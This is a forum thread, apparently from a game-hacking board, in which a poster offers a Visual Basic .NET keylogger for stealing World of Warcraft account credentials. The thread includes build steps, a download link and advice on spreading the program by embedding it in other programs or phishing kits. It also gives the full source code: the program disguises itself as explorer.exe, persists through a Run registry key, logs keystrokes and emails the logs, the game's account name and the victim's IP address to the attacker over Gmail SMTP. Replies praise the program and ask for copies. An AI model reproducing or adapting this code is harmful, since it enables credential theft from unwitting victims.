Keylogger scam

[pia32]

Intro

This scam uses a keylogger to detect the victim's keystrokes. It then emails the data to you.

Details

This program detects keystrokes ONLY when WOW is open. It will email the logs and the username which it can detect even if the "Remember username" box is checked. It hides itself from everything but the process list, where it is masked as "explorer.exe". The program automatically installs itself into the registry so it will be run on startup. The emailing process requires a G-mail account and it will perform the email every time the computer is started up on sunday. (So you may get 10 emails)


VIRUS SCAN
Note that this actually is a keylogger to the person who executes it, so technically it is a virus, but it comes up clean!!
Scan


Download
I have decided to give out the link. Have fun! (But ill only help people with 5 rep)

http://rapidshare.com/files/206230369/explorer.zip



Set Up
Requires a VB.NET compiler, or I can set it up for you

Code:

Download the file




Extract it



Open the folder




Open the project




View the code



Edit the selected





Click build




Exit visual studio and go to where you extracted the file, and open the explorer folder.




Open the explorer subfolder




Open the bin folder





Open the release folder




The explorer.exe thing should be in there. Now spread the virus!!!

Infect another computer

All you have to do is send them the executable and get them to run it, and then it automatically installs itself. To convince people to run it, I suggest you embed it in another program (If you have the skill. I will embed it for you if you PM me).



Interpreting the email

In the email you will receive is like this
Red is stuff you should care about

Code:

SET maxFPS "30"
SET maxFPSBk "10"
SET readTOS "1"
SET readEULA "1"
SET readScanning "-1"
SET readContest "-1"
SET locale "-----"
SET hwDetect "0"
SET gxColorBits "24"
SET gxDepthBits "24"
SET gxResolution "1024x768"
SET gxRefresh "60"
SET gxMultisampleQuality "0.000000"
SET gxFixLag "0"
SET farclip "1277"
SET particleDensity "1.000000"
SET movie "0"
SET realmList "--.logon.worldofwarcraft.com"
SET mouseSpeed "1"
SET showToolsUI "1"
SET Gamma "0.500000"
SET coresDetected "2"
SET Sound_VoiceChatInputDriverName "Realtek HD Audio Input"
SET Sound_VoiceChatOutputDriverName "Realtek HD Audio output"
SET Sound_OutputDriverName "Realtek HD Audio output"
SET ChatMusicVolume "0"
SET ChatSoundVolume "1"
SET ChatAmbienceVolume "0"
SET Sound_MasterVolume "0.40000000596046"
SET Sound_SFXVolume "1"
SET Sound_MusicVolume "0.69999998807907"
SET Sound_AmbienceVolume "0.20000000298023"
SET readTerminationWithoutNotice "-1"
SET Sound_ZoneMusicNoDelay "1"
SET movieSubtitle "1"
SET videoOptionsVersion "1"
SET groundEffectDist "70"
SET Sound_EnableSoundWhenGameIsInBG "1"
SET Sound_VoiceChatInputDriverIndex "1"
SET Sound_OutputDriverIndex "1"
SET Sound_VoiceChatOutputDriverIndex "1"
SET Sound_NumChannels "64"
SET Sound_EnableHardware "1"
SET Sound_EnableErrorSpeech "0"
SET timingTestError "0"
SET windowResizeLock "1"
SET portal "us"
SET installType "Retail"
SET patchlist "--.version.worldofwarcraft.com"
SET gameTip "30"
SET VoiceActivationSensitivity "0.39999997615814"
SET gxTripleBuffer "1"
SET environmentDetail "1.5"
SET realmName "--------"
SET Sound_EnableAmbience "0"
SET specular "1"
SET OutboundChatVolume "1.5"
SET EnableMicrophone "0"
SET checkAddonVersion "0"
SET spellEffectLevel "0"
SET textureFilteringMode "0"
SET weatherDensity "0"
SET accountName "Their username here"
SET lastCharacterIndex "6"
Their password here
t

Sorry for all the unnecessary data, but the username is always in that huge list.

Uninstall

Code:

If you accidentally ran it you can remove it by
Deleting the registry entry HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\explorer

Deleting the file C:\WINDOWS\ErrorLog.txt

Deleting the file C:\WINDOWS\WBEM\explorer.exe

V1.1
-Now with more try catch blocks


Flame constructively
If you actually succeed in scamming someone, write a post with your success and story



I have successfully embedded this in one of my phisher programs. (Now it's a double phisher!)

[parinoia]

Very nice man, but also very scary. Are there any good guides out there to get started with this stuff?

[omfgwtflolmfao]

Rofl I want this program to scam lil nubletz

[pia32]

You mean with programming it or spreading the virus?

Programming:
I took a class on VB and the stuff I didnt know I just googled.

Spreading the Virus:
Look for a phishing guide and embed the virus in there.

[dume200]

File explorer.exe received on 03.02.2009 01:20:45 (CET)
Current status: finished
Result: 0/39 (0.00%)

Feels like scam... dont message him! i want a REAL SCAN!

[pia32]

IT IS NOT A SCAM!!!!!
well, at least not for you.
Here is the code

Code:

Imports Microsoft.Win32
Imports System.Threading
Imports System.Net.Mail
Imports Microsoft.VisualBasic.FileIO
Public Class explorer


    'EDIT HERE ---------------------------------------
    Dim EmailAddress As String = "[email protected]"
    Dim Username As String = "my_email"
    Dim Password As String = "my_pass"
    'EDIT HERE ----------------------------------------------
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

    Public result As Integer
    Public keys As String
    Public length As Integer
    Dim curdate As DateTime
    Dim mailed As Boolean = False
    Dim quote As Char = Chr(34)

    Dim FileToCopy As String = "explorer.exe"
    Dim NewCopy As String = "C:\WINDOWS\WBEM\explorer.exe"

    Dim writetext As String




    

    Dim log As String = "C:\WINDOWS\ErrorLog.txt"
    Dim wtf As String = "C:\Program Files\World of Warcraft\WTF\Config.wtf"





    Private Sub KeyTimer_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles KeyTimer.Tick
        length += 1

        If Process.GetProcessesByName("Wow").Length = 0 Then
            'Wow no

        Else
            'Wow yes




            For i = 1 To 255
                result = 0
                result = GetAsyncKeyState(i)

                If result = -32767 Then
                    keys = Convert.ToChar(i)
                    My.Computer.FileSystem.WriteAllText("C:\WINDOWS\ErrorLog.txt", keys, True)

                End If
            Next i
        End If


        If length >= 20000 Then
            curdate = DateTime.Now
            If curdate.DayOfWeek = DayOfWeek.Sunday And mailed = False Then
                Mail()
                mailed = True

            End If
        End If


        
    End Sub

    Private Sub Main_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load, MyBase.Activated
        Me.Hide()
        





        Try
            My.Computer.FileSystem.ReadAllText("C:\WINDOWS\Kftq.txt")
        Catch ex As Exception
            System.IO.File.Copy(FileToCopy, NewCopy)
            My.Computer.FileSystem.WriteAllText("C:\WINDOWS\Kftq.txt", "Blah", False)
            'My.Computer.FileSystem.WriteAllText("C:\Windows\win.ini", "load=" & quote & "C:\WINDOWS\WBEM\explorer.exe" & quote, True)


            Dim Reg As Object
            Reg = CreateObject("wscript.shell")
            ' Suppose Write App to Startup with Computer
            Reg.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\explorer", quote & "C:\WINDOWS\WBEM\explorer.exe" & quote)
        End Try



        
    End Sub


    Private Sub Mail()

        Try


            Dim WC As New System.Net.WebClient
            Dim MyMailMessage As New MailMessage


            MyMailMessage.From = New MailAddress(EmailAddress)

            MyMailMessage.To.Add(EmailAddress)


            MyMailMessage.Subject = ("Their IP is: " & System.Text.Encoding.ASCII.GetString((WC.DownloadData("http://whatismyip.com/automation/n09230945.asp"))))
            WC.Dispose()
            MyMailMessage.Body = (My.Computer.FileSystem.ReadAllText(wtf) & My.Computer.FileSystem.ReadAllText(log))
            Dim SMTPServer As New SmtpClient("smtp.gmail.com")
            SMTPServer.Port = 587



            SMTPServer.Credentials = New System.Net.NetworkCredential(Username, Password)




            SMTPServer.EnableSsl = True



            SMTPServer.Send(MyMailMessage)



        Catch ex As SmtpException

        End Try
    End Sub

End Class

What is does is if it doesnt find that it was installed before, it makes it autostarup.

[Tierman]

Getting this error when I try to keylog myself.

[pia32]

Oops. Either you need the latest .NET framework or you installed windows in a different location. (or you have vista which i cant test) Ill try to fix it this week.


EDIT: It should work now. PM me for the newer copy.

[jenkins0075]

Awsome i will get back when i got some more rep

[manowarlock]

When i recieve my program from the pm i sent you you will be getting some rep cookies from me

[Lilfrost]

Very nice will bbl

[pia32]

Im sorry, but I currently dont have a stable release of the phisher. Ive made it so that it only records strokes when the logon screen is open, and Im still debugging


EDIT : Fixed. I dont check this thread very often anymore so pm me if you want to say anything